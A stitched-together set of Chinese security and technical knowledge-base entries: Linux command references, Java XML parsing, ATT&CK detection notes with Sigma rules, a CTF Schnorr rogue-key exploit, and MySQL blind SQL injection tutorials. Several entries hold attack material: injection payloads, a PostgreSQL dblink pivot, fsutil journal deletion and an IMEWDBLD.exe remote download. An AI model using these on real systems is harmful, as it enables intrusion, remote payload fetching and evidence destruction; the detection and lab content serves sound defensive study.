fmt === 读取文件后优化处理并输出 ## 补充说明 **fmt命令** 读取文件的内容,根据选项的设置对文件格式进行简单的优化处理,并将结果送到标准输出设备。 ### 语法 ```shell fmt(选项)(参数) ``` ### 选项 ```shell -c或--crown-margin:每段前两列缩排; -p<列起始字符串>或-prefix=<列起始字符串>:仅合并含有指定字符串的列,通常运用在程序语言的注解方面; -s或--split-only:只拆开字数超出每列字符数的列,但不合并字数不足每列字符数的列; -t或--tagged-paragraph:每列前两列缩排,但第1列和第2列的缩排格式不同; -u或--uniform-spacing:每列字符之间都以一个空格字符间隔,每个句子之间则两个空格字符分隔; -w<每列字符数>或--width=<每列字符数>或-<每列字符数>:设置每列的最大字符数。 ``` ### 参数 指定要优化格式的文件。
sec-knowleage
# XML --- ## DOM DOM 是 Document Object Model 的缩写,DOM 模型就是把 XML 结构作为一个树形结构处理,从根节点开始,每个节点都可以包含任意个子节点。 我们以下面的 XML 为例: ```xml <?xml version="1.0" encoding="UTF-8" ?> <book id="1"> <name>Java核心技术</name> <author>Cay S. Horstmann</author> <isbn lang="CN">1234567</isbn> <tags> <tag>Java</tag> <tag>Network</tag> </tags> <pubDate/> </book> ``` 如果解析为 DOM 结构,它大概长这样: ``` ┌─────────┐ │document │ └─────────┘ │ ▼ ┌─────────┐ │ book │ └─────────┘ │ ┌──────────┬──────────┼──────────┬──────────┐ ▼ ▼ ▼ ▼ ▼ ┌─────────┐┌─────────┐┌─────────┐┌─────────┐┌─────────┐ │ name ││ author ││ isbn ││ tags ││ pubDate │ └─────────┘└─────────┘└─────────┘└─────────┘└─────────┘ │ ┌────┴────┐ ▼ ▼ ┌───────┐ ┌───────┐ │ tag │ │ tag │ └───────┘ └───────┘ ``` 注意到最顶层的 document 代表 XML 文档,它是真正的 “根”,而 `<book>` 虽然是根元素,但它是 document 的一个子节点。 Java 提供了 DOM API 来解析 XML,它使用下面的对象来表示 XML 的内容: * Document:代表整个 XML 文档; * Element:代表一个 XML 元素; * Attribute:代表一个元素的某个属性。 使用 DOM API 解析一个 XML 文档的代码如下: ```java InputStream input = Main.class.getResourceAsStream("/book.xml"); DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance(); DocumentBuilder db = dbf.newDocumentBuilder(); Document doc = db.parse(input); ``` `DocumentBuilder.parse()` 用于解析一个 XML,它可以接收 InputStream,File 或者 URL,如果解析无误,我们将获得一个 Document 对象,这个对象代表了整个 XML 文档的树形结构,需要遍历以便读取指定元素的值: ```java void printNode(Node n, int indent) { for (int i = 0; i < indent; i++) { System.out.print(' '); } switch (n.getNodeType()) { case Node.DOCUMENT_NODE: // Document节点 System.out.println("Document: " + n.getNodeName()); break; case Node.ELEMENT_NODE: // 元素节点 System.out.println("Element: " + n.getNodeName()); break; case Node.TEXT_NODE: // 文本 System.out.println("Text: " + n.getNodeName() + " = " + n.getNodeValue()); break; case Node.ATTRIBUTE_NODE: // 属性 System.out.println("Attr: " + n.getNodeName() + " = " + n.getNodeValue()); break; default: // 其他 System.out.println("NodeType: " + n.getNodeType() + ", NodeName: " + n.getNodeName()); } for (Node child = n.getFirstChild(); child != null; child = child.getNextSibling()) { printNode(child, indent + 1); } } ``` 解析结构如下: ``` Document: #document Element: book Text: #text = Element: name Text: #text = Java核心技术 Text: #text = Element: author Text: #text = Cay S. Horstmann Text: #text = Element: isbn Text: #text = 1234567 Text: #text = Element: tags Text: #text = Comment: #comment = this is comment Text: #text = Element: tag Text: #text = Java Text: #text = Element: tag Text: #text = Network Text: #text = Text: #text = Element: pubDate Text: #text = ``` 对于 DOM API 解析出来的结构,我们从根节点 Document 出发,可以遍历所有子节点,获取所有元素、属性、文本数据,还可以包括注释,这些节点被统称为 Node,每个 Node 都有自己的 Type,根据 Type 来区分一个 Node 到底是元素,还是属性,还是文本,等等。 使用 DOM API 时,如果要读取某个元素的文本,需要访问它的 Text 类型的子节点,所以使用起来还是比较繁琐的。 --- ## SAX 使用 DOM 解析 XML 的优点是用起来省事,但它的主要缺点是内存占用太大。 另一种解析 XML 的方式是 SAX。SAX 是 Simple API for XML 的缩写,它是一种基于流的解析方式,边读取 XML 边解析,并以事件回调的方式让调用者获取数据。因为是一边读一边解析,所以无论 XML 有多大,占用的内存都很小。 SAX 解析会触发一系列事件: * startDocument:开始读取 XML 文档; * startElement:读取到了一个元素,例如 `<book>`; * characters:读取到了字符; * endElement:读取到了一个结束的元素,例如 `</book>`; * endDocument:读取 XML 文档结束。 如果我们用 SAX API 解析 XML,Java 代码如下: ```java InputStream input = Main.class.getResourceAsStream("/book.xml"); SAXParserFactory spf = SAXParserFactory.newInstance(); SAXParser saxParser = spf.newSAXParser(); saxParser.parse(input, new MyHandler()); ``` 关键代码 `SAXParser.parse()` 除了需要传入一个 InputStream 外,还需要传入一个回调对象,这个对象要继承自 DefaultHandler: ```java class MyHandler extends DefaultHandler { public void startDocument() throws SAXException { print("start document"); } public void endDocument() throws SAXException { print("end document"); } public void startElement(String uri, String localName, String qName, Attributes attributes) throws SAXException { print("start element:", localName, qName); } public void endElement(String uri, String localName, String qName) throws SAXException { print("end element:", localName, qName); } public void characters(char[] ch, int start, int length) throws SAXException { print("characters:", new String(ch, start, length)); } public void error(SAXParseException e) throws SAXException { print("error:", e); } void print(Object... objs) { for (Object obj : objs) { System.out.print(obj); System.out.print(" "); } System.out.println(); } } ``` 运行 SAX 解析代码,可以打印出下面的结果: ``` start document start element: book characters: start element: name characters: Java核心技术 end element: name characters: start element: author characters: Cay S. Horstmann end element: author characters: start element: isbn characters: 1234567 end element: isbn characters: start element: tags characters: characters: start element: tag characters: Java end element: tag characters: start element: tag characters: Network end element: tag characters: end element: tags characters: start element: pubDate end element: pubDate characters: end element: book end document ``` 如果要读取 `<name>` 节点的文本,我们就必须在解析过程中根据 `startElement()` 和 `endElement()` 定位当前正在读取的节点,可以使用栈结构保存,每遇到一个 `startElement()` 入栈,每遇到一个 `endElement()` 出栈,这样,读到 `characters()` 时我们才知道当前读取的文本是哪个节点的。可见,使用 SAX API 仍然比较麻烦。 --- # Jackson Jackson 的开源的第三方库可以轻松做到 XML 到 JavaBean 的转换。我们要使用 Jackson,先添加两个 Maven 的依赖: ```xml <dependency> <groupId>com.fasterxml.jackson.dataformat</groupId> <artifactId>jackson-dataformat-xml</artifactId> <version>2.10.1</version> </dependency> <dependency> <groupId>org.codehaus.woodstox</groupId> <artifactId>woodstox-core-asl</artifactId> <version>4.4.1</version> </dependency> ``` 然后,定义好 JavaBean,就可以用下面几行代码解析: ```java InputStream input = Main.class.getResourceAsStream("/book.xml"); JacksonXmlModule module = new JacksonXmlModule(); XmlMapper mapper = new XmlMapper(module); Book book = mapper.readValue(input, Book.class); System.out.println(book.id); System.out.println(book.name); System.out.println(book.author); System.out.println(book.isbn); System.out.println(book.tags); System.out.println(book.pubDate); ``` ```java public class Book { public long id; public String name; public String author; public String isbn; public List<String> tags; public String pubDate; } ``` 注意到 XmlMapper 就是我们需要创建的核心对象,可以用 readValue(InputStream, Class) 直接读取 XML 并返回一个 JavaBean。运行上述代码,就可以直接从 Book 对象中拿到数据: ``` 1 Java核心技术 Cay S. Horstmann 1234567 [Java, Network] null ``` 如果要解析的数据格式不是 Jackson 内置的标准格式,那么需要编写一点额外的扩展来告诉 Jackson 如何自定义解析。 --- ## Source & Reference - https://www.liaoxuefeng.com/wiki/1252599548343744/1320418577219618 - https://www.liaoxuefeng.com/wiki/1252599548343744/1320414976409634 - https://www.liaoxuefeng.com/wiki/1252599548343744/1320418596093986
sec-knowleage
--- title: PostgreSQL 数据库 SSRF --- <center><h1>PostgreSQL 数据库 SSRF</h1></center> --- 如果获得了 PostgreSQL 数据库权限,可以通过 PostgreSQL 中的 dblink 插件横向到其他同网段数据库,这里以 AWS RDS 为例。 这里假设已经得到了一个 PostgreSQL 数据库权限,通过信息收集获得了另一台 PostgreSQL 数据库连接信息,但网络不通无法直接连接,这时可以尝试使用已有的这台 PostgreSQL 数据库进行连接。 ```sql create extension dblink; select dblink_connect('test','host=x.x.x.x port=xxx user=xxx password=xxx dbname=postgres sslmode=disable'); create table t(id int); select * from dblink_send_query('test', 'select version();'); select * from dblink_get_result('test') as t(res text); ``` </br><img width="1000" src="/img/1651979660.png"></br> 可以看到,通过当前 PostgreSQL 数据库成功连接到了另一台 PostgreSQL 数据库并成功执行了 select version(); 命令。 <Vssue /> <script> export default { mounted () { this.$page.lastUpdated = "2022年5月8日" } } </script>
sec-knowleage
version: '2' services: couchdb: image: vulhub/couchdb:2.1.0 ports: - "5984:5984" environment: COUCHDB_USER: admin COUCHDB_PASSWORD: password initd: image: buildpack-deps:focal-curl command: "bash /init.sh" environment: COUCHDB_URL: couchdb:5984 COUCHDB_AUTH: admin:password volumes: - ./init.sh:/init.sh depends_on: - couchdb
sec-knowleage
# T1070-004-win-使用Fsutil删除卷USN日志 ## 来自ATT&CK的描述 攻击者可能会删除其入侵活动所留下的文件。攻击者在系统上丢弃创建的恶意软件、工具或其他可能会留下痕迹的非本机文件。这些文件的删除可以在入侵过程中进行,也可以作为入侵后的过程中进行,以最大程度地减少攻击者留下的足迹。 主机操作系统中提供了一些工具来执行清除,但攻击者也可以使用其他工具。其中包括本机cmd函数(例如DEL),安全删除工具(例如Windows Sysinternals SDelete)或其他第三方文件删除工具。 ## 测试案例 识别使用fsutil.exe删除USN JRNL卷。攻击者使用此技术来消除利用漏洞后创建的文件的活动证据。 更多姿势可参考:[渗透技巧——Windows下NTFS文件的USN Journal](http://app.myzaker.com/news/article.php?pk=5c6e106577ac642d40290442) ## 检测日志 windows security windows sysmon ## 测试复现 ```yml 关闭NTFS日志功能: 在cmd中运行 fsutil: fsutil usn createjournal m=1000 a=100 c: //创建日志 fsutil usn deletejournal /d c: //删除日志 ``` ## 测试留痕 暂无,仅提供4688进程创建事件样例。 windows server 2016/win10 ```yml A new process has been created. Subject: Security ID: WIN-R9H529RIO4Y\Administrator Account Name: Administrator Account Domain: WIN-R9H529RIO4Y Logon ID: 0x1fd23 Process Information: New Process ID: 0xed0 New Process Name: C:\Windows\System32\notepad.exe Token Elevation Type: TokenElevationTypeDefault (1) Mandatory Label: Mandatory Label\Medium Mandatory Level Creator Process ID: 0x8c0 Creator Process Name: c:\windows\system32\explorer.exe Process Command Line: C:\Windows\System32\notepad.exe c:\sys\junk.txt ``` ## 检测规则/思路 ### Sigma ```yml title: 使用Fsutil删除卷USN日志 description: 识别使用fsutil.exe删除USN JRNL卷。攻击者使用此技术来消除利用漏洞后创建的文件的活动证据。 status: experimental references: - https://www.elastic.co/guide/en/siem/guide/current/delete-volume-usn-journal-with-fsutil.html#delete-volume-usn-journal-with-fsutil logsource: ​ product: windows ​ service: security detection: ​ selection: ​ EventID: ​ - 1 #sysmon ​ - 4688 #Windows 安全日志 New Process Name: 'fsutil.exe' #Application Name Commanline: 'usn deletejournal' ​ condition: selection level: low ``` ### Elastic rule query ```yml event.action:"Process Create (rule: ProcessCreate)" and process.name:fsutil.exe and process.args:(deletejournal and usn) ``` ### 建议 如果你对windows有足够多的了解,那么相信你也知道应该如何去用Windows日志进行分析此类攻击行为,比如依靠4688中的进程和命令行参数进行检测分析。 ## 参考推荐 MITRE-ATT&CK-T1070-004 <https://attack.mitre.org/techniques/T1070/004/> 渗透技巧——Windows下NTFS文件的USN Journal <http://app.myzaker.com/news/article.php?pk=5c6e106577ac642d40290442> 使用Fsutil删除卷USN日志 Elastic rule query <https://www.elastic.co/guide/en/siem/guide/current/delete-volume-usn-journal-with-fsutil.html#delete-volume-usn-journal-with-fsutil> 4688事件样例 <https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4688>
sec-knowleage
chmod === 用来变更文件或目录的权限 ## 概要 ```shell chmod [OPTION]... MODE[,MODE]... FILE... chmod [OPTION]... OCTAL-MODE FILE... chmod [OPTION]... --reference=RFILE FILE... ``` ## 主要用途 - 通过符号组合的方式更改目标文件或目录的权限。 - 通过八进制数的方式更改目标文件或目录的权限。 - 通过参考文件的权限来更改目标文件或目录的权限。 ## 参数 mode:八进制数或符号组合。 file:指定要更改权限的一到多个文件。 ## 选项 ```shell -c, --changes:当文件的权限更改时输出操作信息。 --no-preserve-root:不将'/'特殊化处理,默认选项。 --preserve-root:不能在根目录下递归操作。 -f, --silent, --quiet:抑制多数错误消息的输出。 -v, --verbose:无论文件是否更改了权限,一律输出操作信息。 --reference=RFILE:使用参考文件或参考目录RFILE的权限来设置目标文件或目录的权限。 -R, --recursive:对目录以及目录下的文件递归执行更改权限操作。 --help:显示帮助信息并退出。 --version:显示版本信息并退出。 ``` ## 返回值 返回状态为成功除非给出了非法选项或非法参数。 ## 例子 > 参考`man chmod`文档的`DESCRIPTION`段落得知: > - `u`符号代表当前用户。 > - `g`符号代表和当前用户在同一个组的用户,以下简称组用户。 > - `o`符号代表其他用户。 > - `a`符号代表所有用户。 > - `r`符号代表读权限以及八进制数`4`。 > - `w`符号代表写权限以及八进制数`2`。 > - `x`符号代表执行权限以及八进制数`1`。 > - `X`符号代表如果目标文件是可执行文件或目录,可给其设置可执行权限。 > - `s`符号代表设置权限suid和sgid,使用权限组合`u+s`设定文件的用户的ID位,`g+s`设置组用户ID位。 > - `t`符号代表只有目录或文件的所有者才可以删除目录下的文件。 > - `+`符号代表添加目标用户相应的权限。 > - `-`符号代表删除目标用户相应的权限。 > - `=`符号代表添加目标用户相应的权限,删除未提到的权限。 ```shell linux文件的用户权限说明: # 查看当前目录(包含隐藏文件)的长格式。 ls -la -rw-r--r-- 1 user staff 651 Oct 12 12:53 .gitmodules # 第1位如果是d则代表目录,是-则代表普通文件。 # 更多详情请参阅info coreutils 'ls invocation'(ls命令的info文档)的'-l'选项部分。 # 第2到4位代表当前用户的权限。 # 第5到7位代表组用户的权限。 # 第8到10位代表其他用户的权限。 ``` ```shell # 添加组用户的写权限。 chmod g+w ./test.log # 删除其他用户的所有权限。 chmod o= ./test.log # 使得所有用户都没有写权限。 chmod a-w ./test.log # 当前用户具有所有权限,组用户有读写权限,其他用户只有读权限。 chmod u=rwx, g=rw, o=r ./test.log # 等价的八进制数表示: chmod 764 ./test.log # 将目录以及目录下的文件都设置为所有用户拥有读写权限。 # 注意,使用'-R'选项一定要保留当前用户的执行和读取权限,否则会报错! chmod -R a=rw ./testdir/ # 根据其他文件的权限设置文件权限。 chmod --reference=./1.log ./test.log ``` ### 注意 1. 该命令是`GNU coreutils`包中的命令,相关的帮助信息请查看`man chmod`或`info coreutils 'chmod invocation'`。 2. 符号连接的权限无法变更,如果用户对符号连接修改权限,其改变会作用在被连接的原始文件。 3. 使用`-R`选项一定要保留当前用户的执行和读取权限,否则会报错!
sec-knowleage
# 网络安全监控:Bro [官网地址](https://www.bro.org/) [学习平台](https://www.bro.org/documentation/index.html) ## 安装与使用 ### Centos7安装Bro * **解决依赖** ``` yum install cmake.x86_64 gcc.x86_64 gcc-c++.x86_64 flex.x86_64 bison.x86_64 libpcap.x86_64 libpcap-devel.x86_64 openssl-devel.x86_64 python-devel.x86_64 swig.x86_64 zlib-devel.x86_64 -y ``` * **yum安装** ``` # 配置yum源 cd /etc/yum.repos.d/ wget http://download.opensuse.org/repositories/network:bro/CentOS_7/network:bro.repo # 安装 yum install bro.x86_64 -y # 配置运行环境 vim /etc/profile ``` ``` export PATH=/opt/bro/bin:$PATH ``` ``` source /etc/profile ``` * **编译安装** ``` # 下载(推荐) wget https://www.bro.org/downloads/bro-2.5.5.tar.gz # 或者通过git下载 git clone --recursive git://git.bro.org/bro # 安装 tar -xf bro-2.5.5.tar.gz && cd bro-2.5.5 ./configure make && make install # 此时的安装路径为:/usr/local/bro ``` ### Bro配置文件 ``` # $PREFIX:安装bro所在的目录,视具体环境所定。 $PREFIX/etc/node.cfg 监听网卡文件 $PREFIX/etc/network.cfg 默认设置 $PREFIX/etc/broctl.cfg 设置邮箱MailTo,并且设置LogRotationInterval改变日志压缩频率 ``` ### Bro基础使用 * **BroControl** ``` # 配置监听网卡,我的本地网卡是ens33,修改如图 vim /usr/local/bro/etc/node.cfg # 执行broctl ``` ![bro-1](https://github.com/bloodzer0/ossa/raw/master/infrastructure-security/host-security/img/bro-1.png) ![bro-2](https://github.com/bloodzer0/ossa/raw/master/infrastructure-security/host-security/img/bro-2.png) ``` # 查看日志 ls -l /usr/local/bro/logs/current/ # 会话日志:conn.log # 告警日志: weird.log # 协议错误 notice.log # bro脚本产生的告警 # 协议解析日志:dns.log、files.log、http.log、sip.log、snmp.log ``` ![bro-3](https://github.com/bloodzer0/ossa/raw/master/infrastructure-security/host-security/img/bro-3.png) * **Bro Command-Line** ``` bro -i ens33 # 选择监听接口,此时日志在执行目录中 bro -r *.pcap # 读取一个pacp进行分析 bro -C # 禁用校验和 bro -f # 捕获流量时进行过滤 ``` * **bro_cut** 类似awk,提取指定的列 ### Bro Scripts ## Bro+ELK实现入侵检测日志分析 [ELK安装文档](https://bloodzer0.github.io/ossa/infrastructure-security/host-security/log-analysis/elk1/) ### 分析SSH登录日志 查看Bro中SSH的日志: ``` cat /usr/local/bro/logs/current/ssh.log ``` ![bro-4](https://github.com/bloodzer0/ossa/raw/master/infrastructure-security/host-security/img/bro-4.png) 编辑logstash配置文件: ``` wget https://raw.githubusercontent.com/fakrul/bro-elk/master/bro-ssh_log.conf # 修改日志文件路径 # 修改es地址与索引名称 # 查看效果 ``` ![bro-5](https://github.com/bloodzer0/ossa/raw/master/infrastructure-security/host-security/img/bro-5.png) ## 参考资料 [使用Bro IDS和Intel Critical Stack分析网络活动](https://bbs.pediy.com/thread-226565.htm)
sec-knowleage
# T1105-win-入口工具转移-IMEWDBLD.exe(白名单) ## 来自ATT&CK的描述 攻击者可能会将工具或其他文件从外部系统转移到被攻击的环境中。可以通过命令和控制通道从外部攻击者控制的系统复制文件,用以将工具带入被攻击的网络中,或通过其他工具(如 FTP)的替代协议。 也可以使用 scp、rsync 和 sftp等本地工具在Mac和 Linux上复制文件。 ## 测试案例 IMEWDBLD.exe是微软拼音的开放扩展字典模块,主要用来下载字典文件,在Windows中主要存在路径为: **路径:** ``` - C:\Windows\System32\IME\SHARED\IMEWDBLD.exe ``` 可以通过`C:\Windows\System32\IME\SHARED\IMEWDBLD.exe <URL>`进行下载任意文件,但是下载的路径为隐藏的文件/文件夹 并且路径为`C:\Users\%username%\AppData\Local\Microsoft\Windows\INetCache\IE\[随机值]`; 所以其利用方式是 ``` C:\Windows\System32\IME\SHARED\IMEWDBLD.exe https://pastebin.com/raw/tdyShwLw ``` 用例:从 Internet 下载文件 所需权限:用户 操作系统:Windows 10 查找下载文件路径: ``` forfiles /P "%localappdata%\Microsoft\Windows\INetCache" /S /M * /C "cmd /c echo @path" > 参数介绍 /P 表示开始搜索的路径。默认文件夹是当前工作的 目录 (.)。 /S 指导forfiles递归到子目录。像"DIR /S"。 /M 根据搜索掩码搜索文件。默认搜索掩码是 '*'。 /C 表示为每个文件执行的命令。命令字符串应该用双引号括起来。 @path返回文件的完整路径 ``` ## 检测日志 windows安全日志 ## 测试复现 ```bash C:\Users\liyang>C:\Windows\System32\IME\SHARED\IMEWDBLD.exe https://dldir1.qq.com/qqfile/qq/PCQQ9.5.9/QQ9.5.9.28650.exe C:\Users\liyang>forfiles /P "%localappdata%\Microsoft\Windows\INetCache" /S /M * /C "cmd /c echo @path" "C:\Users\liyang\AppData\Local\Microsoft\Windows\INetCache\Content.IE5" "C:\Users\liyang\AppData\Local\Microsoft\Windows\INetCache\IE" "C:\Users\liyang\AppData\Local\Microsoft\Windows\INetCache\Low" "C:\Users\liyang\AppData\Local\Microsoft\Windows\INetCache\Virtualized" "C:\Users\liyang\AppData\Local\Microsoft\Windows\INetCache\IE\container.dat" "C:\Users\liyang\AppData\Local\Microsoft\Windows\INetCache\IE\EG7SF236" "C:\Users\liyang\AppData\Local\Microsoft\Windows\INetCache\IE\JKCC1BIU" "C:\Users\liyang\AppData\Local\Microsoft\Windows\INetCache\IE\EG7SF236\DisabledFlights[1].cache" "C:\Users\liyang\AppData\Local\Microsoft\Windows\INetCache\IE\EG7SF236\dyntelconfig[2].cache" "C:\Users\liyang\AppData\Local\Microsoft\Windows\INetCache\IE\EG7SF236\RemoteSettings_Installer[1].cache" "C:\Users\liyang\AppData\Local\Microsoft\Windows\INetCache\IE\EG7SF236\ShippedFlights[1].cache" "C:\Users\liyang\AppData\Local\Microsoft\Windows\INetCache\IE\EG7SF236\tdyShwLw[1].txt" "C:\Users\liyang\AppData\Local\Microsoft\Windows\INetCache\IE\EG7SF236\views[1]" "C:\Users\liyang\AppData\Local\Microsoft\Windows\INetCache\IE\EG7SF236\windows-app-web-link[1].json" "C:\Users\liyang\AppData\Local\Microsoft\Windows\INetCache\IE\JKCC1BIU\QQ9.5.9.28650[1].exe" #文件已经被下载成功 "C:\Users\liyang\AppData\Local\Microsoft\Windows\INetCache\IE\JKCC1BIU\views[1]" ``` 当执行下载任务时,Windows弹窗提示失败,忽略即可。实际上文件已经下载到本地目录中。 ## 测试留痕 ```yml 已创建新进程。 创建者主题: 安全 ID: DESKTOP-PT656L6\liyang 帐户名: liyang 帐户域: DESKTOP-PT656L6 登录 ID: 0x47126 目标主题: 安全 ID: NULL SID 帐户名: - 帐户域: - 登录 ID: 0x0 进程信息: 新进程 ID: 0x2278 新进程名称: C:\Windows\System32\IME\SHARED\IMEWDBLD.EXE 令牌提升类型: %%1938 强制性标签: Mandatory Label\Medium Mandatory Level 创建者进程 ID: 0x1ca8 创建者进程名称: C:\Windows\System32\cmd.exe 进程命令行: C:\Windows\System32\IME\SHARED\IMEWDBLD.exe  https://dldir1.qq.com/qqfile/qq/PCQQ9.5.9/QQ9.5.9.28650.exe ``` ## 检测方法/思路 ### Sigma规则 ```yml title: IMEWDBLD白名单利用监测 status: experimental date: 2022/04/20 author: 12306Br0 tags: - attack.command_and_control - attack.t1105 references: - https://lolbas-project.github.io/lolbas/Binaries/IMEWDBLD/ - https://cloud.tencent.com/developer/article/1848645 logsource: product: windows category: security selection: Image: C:\Windows\System32\IME\SHARED\IMEWDBLD.EXE CommandLine:http*// condition: selection falsepositives: - Unknown level: medium ``` ## 参考推荐 MITRE-ATT&CK-T1105 <https://attack.mitre.org/techniques/T1105> IMEWDBLD.exe <https://lolbas-project.github.io/lolbas/Binaries/IMEWDBLD/> IMEWDBLD.exe ByPass360 下载文件 <https://cloud.tencent.com/developer/article/1848645>
sec-knowleage
# Bank (crypto, 94p) In the challenge we get two files. First one contains [properly looking Schnorr signature code](schnorr.py) and the second one is the [server code](multi-schnorr.py). The application generates a new private-public key for the server and then in look: - asks us for our public key - ask for action to perform We can perform 3 actions: 1. Send `DEPOSIT` message signed with our private key and server will verify this signature agains the public key we send initially. 2. SEND `WITHDRAW` message signed with our private key and with server private key, and server will verify this with our public key combined with server public key (in this context it means our ECC Public Key Point will be added to the server Point). 3. As for server public key. There are 2 key points to notice here: 1. In given connection (so while server maintains his private-public key pair) we can perform multiple operations and each one of the for `different` public key. This is because public key is requested every time. 2. Adding and subtracting points on Elliptic Curve is not a difficult operation. It's "division" that is the hard operation that security is based on. This means if we have points `P` and `Q` it's very simple to calculate point `S` such that `P+S = Q`. Subtraction is simply addition of point with `y` coordinate negated, so `S = P-Q = (xp,yp)+(xq,-yq)` The layout of the attack is pretty simple: 1. Generate some private-public keypair for ourselves (`P` and `pP`). 1. Send our public key `P` and request server public key, let's call it point `Q`. 2. Send our public key `P` and send `DEPOSIT` message signed with our private key `pP`. 4. Calculate point `S = P-Q = (xp,yp)+(xq,-yq)` 5. Send point `S` as our public key and send `WITHDRAW` operation signed with our private key `pP`. 6. Now the server will add their public key `Q` to our public key `S` to verify our message. But `S+Q = P-Q+Q = P`, our public key, for which `pP` is the corresponding private key. 7. The message will be properly verified and we will get back the flag. We implement this by: ```python def main(): host = "tcp.realworldctf.com" # host = "localhost" port = 20014 s = nc(host, port) data = receive_until(s, "\n").strip() prefix = data[-16:] print(data) print(prefix) res = breakPoW(prefix) s.sendall(res) sk, pk = generate_keys() real_key_message = (str(pk[0]) + "," + str(pk[1])) send(s, base64.b64encode(real_key_message)) send(s, base64.b64encode("1")) deposit_signature = schnorr_sign("DEPOSIT", sk) send(s, base64.b64encode(deposit_signature)) send(s, base64.b64encode(real_key_message)) send(s, base64.b64encode("3")) data = receive_until_match(s, "one of us: .*\n") serverPk = re.findall("one of us: (.*)\n", data)[0].replace("(", "").replace(")", "").replace("L", "") serverPk = (int(serverPk.split(",")[0]), int(serverPk.split(",")[1])) Q = point_add(pk, (serverPk[0], (-serverPk[1]) % p)) fake_key_message = (str(Q[0]) + "," + str(Q[1])) send(s, base64.b64encode(fake_key_message)) withdraw_signature = schnorr_sign("WITHDRAW", sk) send(s, base64.b64encode("2")) send(s, base64.b64encode(withdraw_signature)) interactive(s) main() ``` And we get back the flag: `rwctf{P1Ain_SChNorr_n33Ds_m0re_5ecur1ty!}`
sec-knowleage
# 0x00 盲注 盲注我这里只归纳为 1. 时间盲注 2. 布尔盲注 其实在如今的实际环境中一般盲注的情况毕竟多,时间盲注太费时间 同时对网络要求比较高,二分,dnslog,等等可以加快注入的进程。 # 0x01 盲注中值得注意的问题 1. 盲注中使用 and 你得确定你查询的值得存在 。 2. 在返回多组数据的情况下,你的延时不再是 单纯的 `sleep(5)` 他将根据你返回的数据条数来反复执行 3. 在如同搜索型时尽量搜索存在且数目较少的关键词 4. 尽量不要使用 or 至于以上为什么会出现这种原因 推荐大家看看 这篇文章讲的很清楚https://www.t00ls.net/thread-45590-1-10.html # 0x02 简单时间盲注 时间盲注也叫延时注入 一般用到函数 `sleep()` `BENCHMARK()` 还可以使用笛卡尔积(尽量不要使用,内容太多会很慢很慢),查阅mysql手册会发现很多东西 一般时间盲注我们还需要使用条件判断函数 ### if() `if(expre1,expre2,expre3)` 当expre1为true时,返回expre2,false时,返回expre3 盲注的同时也配合着mysql提供的分割函,与正则函数 like函数,比较函数等等,还是那句话多看手册。 ``` substr substring left ...... ``` 我们一般喜欢把分割的函数编码一下,当然不编码也行,编码的好处就是可以不用引号 常用到的就有 `ascii()` `hex()` 等等 `benchmark()`其作用是来测试一些函数的执行速度。benchmark()中带有两个参数,第一个是执行的次数,第二个是要执行的函数或者是表达式。 ``` mysql> select * from users where id =1 and if((substr((select user()),1,1)='r'),sleep(5),1); Empty set (5.01 sec) mysql> select * from users where id =1 and if((substr((select user()),1,1)='r1'),sleep(5),1); +----+----------+----------+ | id | username | password | +----+----------+----------+ | 1 | Dumb | Dumb | +----+----------+----------+ 1 row in set (0.00 sec) mysql> select * from users where id =1 and if((substr((select user()),1,1)='r'),BENCHMARK(20000000,md5('a')),1); Empty set (5.15 sec) ``` ### case when then else end ``` mysql> select * from users where id =1 and case when (substr((select user()),1,1)="rr") then sleep(3) else 1 end; +----+----------+----------+ | id | username | password | +----+----------+----------+ | 1 | Dumb | Dumb | +----+----------+----------+ 1 row in set (0.00 sec) mysql> select * from users where id =1 and case when (substr((select user()),1,1)="r") then sleep(3) else 1 end; Empty set (3.00 sec) ``` 不推荐使用笛卡尔积当数据过多时会造成DOS。 # 0x03 布尔盲注 盲注思路的思路很多 比如正则匹配,比较函数,运算符,推荐大家可以看看 https://www.anquanke.com/post/id/170626 1. 直接通过字符串截取对比,类似函数很多后面做个总结吧 ``` http://127.0.0.1/sqli/Less-1/?id=1' and substr((select user()),1,1)='r' -- + ``` 2. 用 `IFNULL()` 函数 ``` http://127.0.0.1/sqli/Less-1/?id=1' and IFNULL((substr((select user()),1,1)='r'),0) -- + ``` 3. 使用 比较函数`strcmp()` ``` 1. http://127.0.0.1/sqli/Less-1/?id=1' and strcmp((substr((select user()),1,1)='r'),1) -- + http://127.0.0.1/sqli/Less-1/?id=1' and strcmp((substr((select user()),1,1)='r'),0) -- + 2. mysql> select * from users where id =1 and 0=strcmp((substr((select user()),1,1)),'o'); Empty set (0.00 sec) mysql> select * from users where id =1 and 0=strcmp((substr((select user()),2,1)),'o'); +----+----------+----------+ | id | username | password | +----+----------+----------+ | 1 | Dumb | Dumb | +----+----------+----------+ 1 row in set (0.00 sec) ``` # 0x04 小技巧 在没有办法的情况下必须使用到or 的延时注入不如试试子查询,他也只将延时5s ``` http://192.168.130.135/Less-1/?id=1' or if((substr((select user()),1,1)='r'),((select sleep(5) from information_schema.schemata as b)),1);-- + ``` # 0x05 文末 #### 本文如有错误,请及时提醒,避免误导他人 * author:404
sec-knowleage
# 34. 二叉树中和为某一值的路径 [NowCoder](https://www.nowcoder.com/practice/b736e784e3e34731af99065031301bca?tpId=13&tqId=11177&tPage=1&rp=1&ru=/ta/coding-interviews&qru=/ta/coding-interviews/question-ranking&from=cyc_github) ## 题目描述 输入一颗二叉树和一个整数,打印出二叉树中结点值的和为输入整数的所有路径。路径定义为从树的根结点开始往下一直到叶结点所经过的结点形成一条路径。 下图的二叉树有两条和为 22 的路径:10, 5, 7 和 10, 12 <div align="center"> <img src="https://cs-notes-1256109796.cos.ap-guangzhou.myqcloud.com/ed77b0e6-38d9-4a34-844f-724f3ffa2c12.jpg" width="200"/> </div><br> ## 解题思路 ```java private ArrayList<ArrayList<Integer>> ret = new ArrayList<>(); public ArrayList<ArrayList<Integer>> FindPath(TreeNode root, int target) { backtracking(root, target, new ArrayList<>()); return ret; } private void backtracking(TreeNode node, int target, ArrayList<Integer> path) { if (node == null) return; path.add(node.val); target -= node.val; if (target == 0 && node.left == null && node.right == null) { ret.add(new ArrayList<>(path)); } else { backtracking(node.left, target, path); backtracking(node.right, target, path); } path.remove(path.size() - 1); } ```
sec-knowleage
